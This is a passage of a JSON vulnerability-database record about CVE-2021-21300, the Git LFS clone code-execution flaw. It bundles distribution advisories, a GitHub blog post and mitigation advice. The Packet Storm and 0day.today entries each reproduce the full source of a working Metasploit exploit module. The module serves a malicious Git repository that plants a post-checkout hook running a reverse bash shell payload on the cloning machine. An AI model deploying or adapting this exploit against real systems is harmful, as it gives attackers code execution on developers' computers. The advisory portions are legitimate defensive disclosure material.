`asciidoctor` for the default ruby version\n - The `--committer-date-is-author-date` option of `rebase` and `am`\n subcommands lost the e-mail address by mistake in 2.29\n - The transport protocol v2 has become the default again\n - `git worktree` gained a `repair` subcommand, `git init\n --separate-git-dir` no longer corrupts administrative data related to\n linked worktrees\n - `git maintenance` introduced for repository maintenance tasks\n - `fetch.writeCommitGraph` is deemed to be still a bit too risky and is no\n longer part of the `feature.experimental` set.\n - The commands in the `diff` family honors the `diff.relative`\n configuration variable.\n - `git diff-files` has been taught to say paths that are marked as\n `intent-to-add` are new files, not modified from an empty blob.\n - `git gui` now allows opening work trees from the start-up dialog.\n - `git bugreport` reports what shell is in use.\n - Some repositories have commits that record wrong committer timezone;\n `git fast-import` has an option to pass these timestamps intact to allow\n recreating existing repositories as-is.\n - `git describe` will always use the `long` version when giving its output\n based misplaced tags\n - `git pull` issues a warning message until the `pull.rebase`\n configuration variable is explicitly given\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.3:\n\n zypper in -t patch openSUSE-SLE-15.3-2021-2555=1", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-29T00:00:00", "type": "suse", "title": "Security update for git (moderate)", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-07-29T00:00:00", "id": "OPENSUSE-SU-2021:2555-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/LNQQ262LF4R2GIO7S7J6NRAUDKV7VGPB/", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-08-31T21:04:25", "description": "", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-31T00:00:00", "type": "packetstorm", "title": "Git LFS Clone Command Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-08-31T00:00:00", "id": "PACKETSTORM:163978", "href": "https://packetstormsecurity.com/files/163978/Git-LFS-Clone-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Git \ninclude Msf::Exploit::Git::SmartHttp \ninclude Msf::Exploit::Git::Lfs \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Git LFS Clone Command Exec', \n'Description' => %q{ \nGit clients that support delay-capable clean / smudge \nfilters and symbolic links on case-insensitive file systems are \nvulnerable to remote code execution while cloning a repository. \n \nUsage of clean / smudge filters through Git LFS and a \ncase-insensitive file system changes the checkout order \nof repository files which enables the placement of a Git hook \nin the `.git/hooks` directory. By default, this module writes \na `post-checkout` script so that the payload will automatically \nbe executed upon checkout of the repository. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Johannes Schindelin', # Discovery \n'Matheus Tavares', # Discovery \n'Shelby Pace' # Metasploit module \n], \n'References' => [ \n[ 'CVE', '2021-21300' ], \n[ 'URL', 'https://seclists.org/fulldisclosure/2021/Apr/60' ], \n[ 'URL', 'https://twitter.com/Foone/status/1369500506469527552?s=20' ] \n], \n'DisclosureDate' => '2021-04-26', \n'Platform' => [ 'unix' ], \n'Arch' => ARCH_CMD, \n'Targets' => [ \n[ \n'Git for MacOS, Windows', \n{ \n'Platform' => [ 'unix' ], \n'Arch' => ARCH_CMD, \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [ CRASH_SAFE ], \n'Reliability' => [ REPEATABLE_SESSION ], \n'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('GIT_URI', [ false, 'The URI to use as the malicious Git instance (empty for random)', '' ]) \n] \n) \n \nderegister_options('RHOSTS', 'RPORT') \nend \n \ndef exploit \nsetup_repo_structure \nsuper \nend \n \ndef setup_repo_structure \nlink_content = '.git/hooks' \nlink_name = Rex::Text.rand_text_alpha(8..12).downcase \nlink_obj = GitObject.build_blob_object(link_content) \n \ndir_name = link_name.upcase \ngit_attr = '.gitattributes' \n \ngit_hook = 'post-checkout' \n@hook_payload = \"#!/bin/sh\\n#{payload.encoded}\" \nptr_file = generate_pointer_file(@hook_payload) \n \n# need to initially send the pointer file \n# then send the actual object when Git LFS requests it \ngit_hook_ptr = GitObject.build_blob_object(ptr_file) \n \ngit_attr_content = \"#{dir_name}/#{git_hook} filter=lfs diff=lfs merge=lfs\" \ngit_attr_obj = GitObject.build_blob_object(git_attr_content) \n \nsub_file_content = Rex::Text.rand_text_alpha(0..150) \nsub_file_name = Rex::Text.rand_text_alpha(8..12) \nsub_file_obj = GitObject.build_blob_object(sub_file_content) \n \nregister_dir_for_cleanup('.git') \nregister_files_for_cleanup(git_attr, link_name) \n \n# create subdirectory which holds payload \nsub_tree = \n[ \n{ \nmode: '100644', \nfile_name: sub_file_name, \nsha1: sub_file_obj.sha1 \n}, \n{ \nmode: '100755', \nfile_name: git_hook, \nsha1: git_hook_ptr.sha1 \n} \n] \n \nsub_tree_obj = GitObject.build_tree_object(sub_tree) \n \n# root of repository \ntree_ent = \n[ \n{ \nmode: '100644', \nfile_name: git_attr, \nsha1: git_attr_obj.sha1 \n}, \n{ \nmode: '040000', \nfile_name: dir_name, \nsha1: sub_tree_obj.sha1 \n}, \n{ \nmode: '120000', \nfile_name: link_name, \nsha1: link_obj.sha1 \n} \n] \ntree_obj = GitObject.build_tree_object(tree_ent) \ncommit = GitObject.build_commit_object(tree_sha1: tree_obj.sha1) \n \n@git_objs = \n[ \ncommit, tree_obj, sub_tree_obj, \nsub_file_obj, git_attr_obj, git_hook_ptr, \nlink_obj \n] \n \n@refs = \n{ \n'HEAD' => 'refs/heads/master', \n'refs/heads/master' => commit.sha1 \n} \nend \n \ndef create_git_uri \n\"/#{Faker::App.name.downcase}.git\".gsub(' ', '-') \nend \n \ndef primer \n@git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI'] \n@git_addr = URI.parse(get_uri).merge(@git_repo_uri) \nprint_status(\"Git repository to clone: #{@git_addr}\") \nhardcoded_uripath(@git_repo_uri) \nhardcoded_uripath(\"/#{Digest::SHA256.hexdigest(@hook_payload)}\") \nend \n \ndef on_request_uri(cli, req) \nif req.uri.include?('git-upload-pack') \nrequest = Msf::Exploit::Git::SmartHttp::Request.parse_raw_request(req) \ncase request.type \nwhen 'ref-discovery' \nresponse = send_refs(request) \nwhen 'upload-pack' \nresponse = send_requested_objs(request) \nelse \nfail_with(Failure::UnexpectedReply, 'Git client did not send a valid request') \nend \nelse \nresponse = handle_lfs_objects(req) \nunless response.code == 200 \ncli.send_response(response) \nfail_with(Failure::UnexpectedReply, 'Failed to respond to Git client\\'s LFS request') \nend \nend \n \ncli.send_response(response) \nend \n \ndef send_refs(req) \nfail_with(Failure::UnexpectedReply, 'Git client did not perform a clone') unless req.service == 'git-upload-pack' \n \nresponse = get_ref_discovery_response(req, @refs) \nfail_with(Failure::UnexpectedReply, 'Failed to build a proper response to the ref discovery request') unless response \n \nresponse \nend \n \ndef send_requested_objs(req) \nupload_pack_resp = get_upload_pack_response(req, @git_objs) \nunless upload_pack_resp \nfail_with(Failure::UnexpectedReply, 'Could not generate upload-pack response') \nend \n \nupload_pack_resp \nend \n \ndef handle_lfs_objects(req) \ngit_hook_obj = GitObject.build_blob_object(@hook_payload) \n \ncase req.method \nwhen 'POST' \nprint_status('Sending payload data...') \nresponse = get_batch_response(req, @git_addr, git_hook_obj) \nfail_with(Failure::UnexpectedReply, 'Client request was invalid') unless response \nwhen 'GET' \nprint_status('Sending LFS object...') \nresponse = get_requested_obj_response(req, git_hook_obj) \nfail_with(Failure::UnexpectedReply, 'Client sent invalid request') unless response \nelse \nfail_with(Failure::UnexpectedReply, 'Unable to handle client\\'s request') \nend \n \nresponse \nend \nend \n`\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/163978/git_lfs_clone_command_exec.rb.txt"}], "altlinux": [{"lastseen": "2023-03-31T16:56:35", "description": "Feb. 12, 2021 Dmitry V. Levin 2.29.3-alt1\n \n \n - 2.29.2 -> 2.29.3 (fixes: CVE-2021-21300).\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-02-12T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 10 package git version 2.29.3-alt1", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-02-12T00:00:00", "id": "E128EC2FAE528E202A089B3D6DB390FA", "href": "https://packages.altlinux.org/en/p10/srpms/git/", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2021-03-17T12:15:02", "description": "Today, the Git project [released](<https://lore.kernel.org/git/xmqqim6019yd.fsf@gitster.c.googlers.com/>) new versions to address CVE-2021-21300: a [security vulnerability](<https://github.com/git/git/security/advisories/GHSA-8prw-h3cq-mghm>) in the [delayed checkout mechanism](<https://git-scm.com/docs/gitattributes#_delay>) used by Git LFS during `git clone` operations affecting versions 2.15 and newer.\n\nThese updates address an issue where a specially crafted repository can execute code during a `git clone` on case-insensitive filesystems which support symbolic links by abusing certain types of clean/smudge filters, like those configured by Git LFS.\n\n## Upgrade to the latest Git version\n\nThe most effective way to protect against this vulnerability is to upgrade to 2.30.2. If you can\u2019t update immediately, you can reduce your risk by doing any of the following:\n\n * Disable support for symbolic links in Git by running `git config \n--global core.symlinks false`.\n * Disable support for [process filters](<https://git-scm.com/docs/gitattributes#_long_running_filter_process>). (You can see if any of these are configured on your system by running `git config \n--show-scope --get-regexp 'filter\\..*\\.process'`1)\n * Avoid cloning untrusted repositories.\n\nGitHub itself is not vulnerable to this attack. We do not store checked out copies of repositories on our servers, except for GitHub Pages, which does not use any clean/smudge filters.\n\nCredit for finding and fixing this vulnerability is shared among Matheus Tavares and Johannes Schindelin.\n\n[Download Git 2.30.2](<https://git-scm.com>).\n\n* * *\n\n1\\. In the Windows Command Prompt, replace the single quotes in this example with double quotes.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T18:00:45", "type": "github", "title": "Git clone vulnerability announced", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-03-09T18:25:42", "id": "GITHUB:F5B0002563990B2F3D01561EE569B054", "href": "https://github.blog/2021-03-09-git-clone-vulnerability-announced/", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-27T05:24:14", "description": "Git clients that support delay-capable clean / smudge filters and symbolic links on case-insensitive file systems are vulnerable to remote code execution while cloning a repository. Usage of clean / smudge filters through Git LFS and a case-insensitive file system changes the checkout order of repository files which enables the placement of a Git hook in the .git/hooks directory. By default, this Metasploit module writes a post-checkout script so that the payload will automatically be executed upon checkout of the repository.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-31T00:00:00", "type": "zdt", "title": "Git LFS Clone Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-08-31T00:00:00", "id": "1337DAY-ID-36691", "href": "https://0day.today/exploit/description/36691", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Git\n include Msf::Exploit::Git::SmartHttp\n include Msf::Exploit::Git::Lfs\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Git LFS Clone Command Exec',\n 'Description' => %q{\n Git clients that support delay-capable clean / smudge\n filters and symbolic links on case-insensitive file systems are\n vulnerable to remote code execution while cloning a repository.\n\n Usage of clean / smudge filters through Git LFS and a\n case-insensitive file system changes the checkout order\n of repository files which enables the placement of a Git hook\n in the `.git/hooks` directory. By default, this module writes\n a `post-checkout` script so that the payload will automatically\n be executed upon checkout of the repository.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Johannes Schindelin', # Discovery\n 'Matheus Tavares', # Discovery\n 'Shelby Pace' # Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2021-21300' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2021/Apr/60' ],\n [ 'URL', 'https://twitter.com/Foone/status/1369500506469527552?s=20' ]\n ],\n 'DisclosureDate' => '2021-04-26',\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Targets' => [\n [\n 'Git for MacOS, Windows',\n {\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]\n }\n )\n )\n\n register_options(\n [\n OptString.new('GIT_URI', [ false, 'The URI to use as the malicious Git instance (empty for random)', '' ])\n ]\n )\n\n deregister_options('RHOSTS', 'RPORT')\n end\n\n def exploit\n setup_repo_structure\n super\n end\n\n def setup_repo_structure\n link_content = '.git/hooks'\n link_name = Rex::Text.rand_text_alpha(8..12).downcase\n link_obj = GitObject.build_blob_object(link_content)\n\n dir_name = link_name.upcase\n git_attr = '.gitattributes'\n\n git_hook = 'post-checkout'\n @hook_payload = \"#!/bin/sh\\n#{payload.encoded}\"\n ptr_file = generate_pointer_file(@hook_payload)\n\n # need to initially send the pointer file\n # then send the actual object when Git LFS requests it\n git_hook_ptr = GitObject.build_blob_object(ptr_file)\n\n git_attr_content = \"#{dir_name}/#{git_hook} filter=lfs diff=lfs merge=lfs\"\n git_attr_obj = GitObject.build_blob_object(git_attr_content)\n\n sub_file_content = Rex::Text.rand_text_alpha(0..150)\n sub_file_name = Rex::Text.rand_text_alpha(8..12)\n sub_file_obj = GitObject.build_blob_object(sub_file_content)\n\n register_dir_for_cleanup('.git')\n register_files_for_cleanup(git_attr, link_name)\n\n # create subdirectory which holds payload\n sub_tree =\n [\n {\n mode: '100644',\n file_name: sub_file_name,\n sha1: sub_file_obj.sha1\n },\n {\n mode: '100755',\n file_name: git_hook,\n sha1: git_hook_ptr.sha1\n }\n ]\n\n sub_tree_obj = GitObject.build_tree_object(sub_tree)\n\n # root of repository\n tree_ent =\n [\n {\n mode: '100644',\n file_name: git_attr,\n sha1: git_attr_obj.sha1\n },\n {\n mode: '040000',\n file_name: dir_name,\n sha1: sub_tree_obj.sha1\n },\n {\n mode: '120000',\n file_name: link_name,\n sha1: link_obj.sha1\n }\n ]\n tree_obj = GitObject.build_tree_object(tree_ent)\n commit = GitObject.build_commit_object(tree_sha1: tree_obj.sha1)\n\n @git_objs =\n [\n commit, tree_obj, sub_tree_obj,\n sub_file_obj, git_attr_obj, git_hook_ptr,\n link_obj\n ]\n\n @refs =\n {\n 'HEAD' => 'refs/heads/master',\n 'refs/heads/master' => commit.sha1\n }\n end\n\n def create_git_uri\n \"/#{Faker::App.name.downcase}.git\".gsub(' ', '-')\n end\n\n def primer\n @git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI']\n @git_addr = URI.parse(get_uri).merge(@git_repo_uri)\n print_status(\"Git repository to clone: #{@git_addr}\")\n hardcoded_uripath(@git_repo_uri)\n hardcoded_uripath(\"/#{Digest::SHA256.hexdigest(@hook_payload)}\")\n end\n\n def on_request_uri(cli, req)\n if req.uri.include?('git-upload-pack')\n request = Msf::Exploit::Git::SmartHttp::Request.parse_raw_request(req)\n case request.type\n when 'ref-discovery'\n response = send_refs(request)\n when 'upload-pack'\n response = send_requested_objs(request)\n else\n fail_with(Failure::UnexpectedReply, 'Git client did not send a valid request')\n end\n else\n response = handle_lfs_objects(req)\n unless response.code == 200\n cli.send_response(response)\n fail_with(Failure::UnexpectedReply, 'Failed to respond to Git client\\'s LFS request')\n end\n end\n\n cli.send_response(response)\n end\n\n def send_refs(req)\n fail_with(Failure::UnexpectedReply, 'Git client did not perform a clone') unless req.service == 'git-upload-pack'\n\n response = get_ref_discovery_response(req, @refs)\n fail_with(Failure::UnexpectedReply, 'Failed to build a proper response to the ref discovery request') unless response\n\n response\n end\n\n def send_requested_objs(req)\n upload_pack_resp = get_upload_pack_response(req, @git_objs)\n unless upload_pack_resp\n fail_with(Failure::UnexpectedReply, 'Could not generate upload-pack response')\n end\n\n upload_pack_resp\n end\n\n def handle_lfs_objects(req)\n git_hook_obj = GitObject.build_blob_object(@hook_payload)\n\n case req.method\n when 'POST'\n print_status('Sending payload data...')\n response = get_batch_response(req, @git_addr, git_hook_obj)\n fail_with(Failure::UnexpectedReply, 'Client request was invalid') unless response\n when 'GET'\n print_status('Sending LFS object...')\n response = get_requested_obj_response(req, git_hook_obj)\n fail_with(Failure::UnexpectedReply, 'Client sent invalid request') unless response\n else\n fail_with(Failure::UnexpectedReply, 'Unable to handle client\\'s request')\n end\n\n response\n end\nend\n", "sourceHref": "https://0day.today/exploit/36691", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2022-08-04T13:21:36", "description": "Git is an open-source distributed revision control system. In affected\nversions of Git a specially crafted repository that contains symbolic links\nas well as files using a clean/smudge filter such as Git LFS, may cause\njust-checked out script to be executed while cloning onto a\ncase-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default\nfile systems on Windows and macOS). Note that clean/smudge filters have to\nbe configured for that. Git for Windows configures Git LFS by default, and\nis therefore vulnerable. The problem has been patched in the versions\npublished on Tuesday, March 9th, 2021. As a workaound, if symbolic link\nsupport is disabled in Git (e.g. via `git config --global core.symlinks\nfalse`), the described attack won't work. Likewise, if no clean/smudge\nfilters such as Git LFS are configured globally (i.e. _before_ cloning),\nthe attack is foiled. As always, it is best to avoid cloning repositories\nfrom untrusted sources. The earliest impacted version is 2.14.2. The fix\nversions are: 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4,\n2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T00:00:00", "type": "ubuntucve", "title": "CVE-2021-21300", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-03-09T00:00:00", "id": "UB:CVE-2021-21300", "href": "https://ubuntu.com/security/CVE-2021-21300", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:35", "description": "On case-insensitive file systems with support for symbolic links, if Git is configured globally to apply delay-capable clean/smudge filters (such as Git LFS), Git could be fooled into running remote code during a clone (CVE-2021-21300). \n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-14T21:20:42", "type": "mageia", "title": "Updated git packages fix a security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-03-14T21:20:35", "id": "MGASA-2021-0137", "href": "https://advisories.mageia.org/MGASA-2021-0137.html", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "alpinelinux": [{"lastseen": "2022-09-10T02:05:28", "description": "Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are: 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T20:15:00", "type": "alpinelinux", "title": "CVE-2021-21300", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-09-23T12:45:00", "id": "ALPINE:CVE-2021-21300", "href": "https://security.alpinelinux.org/vuln/CVE-2021-21300", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "ibm": [{"lastseen": "2023-02-28T01:36:55", "description": "## Summary\n\nIBM Watson Speech Services Cartridge for IBM Cloud Pak for Data is vulnerable to vulnerable to arbitrary code execution in MS Visual Studio , caused by a flaw in the Git for Visual Studio (CVE-2021-21300). Git for Visual Studio is used in the base operating system by IBM Watson Speech. Please read the details for remediation below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-21300](<https://vulners.com/cve/CVE-2021-21300>) \n** DESCRIPTION: **Microsoft Visual Studio could allow a remote attacker to execute arbitrary code on the system, caused by a flaw in the Git for Visual Studio. By persuading a victim to open specially-crafted content, an attacker could exploit this vulnerability to execute arbitrary code on the system with privileges of the victim. \nCVSS Base score: 8.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/197283](<https://exchange.xforce.ibmcloud.com/vulnerabilities/197283>) for the current score. \nCVSS Vector: 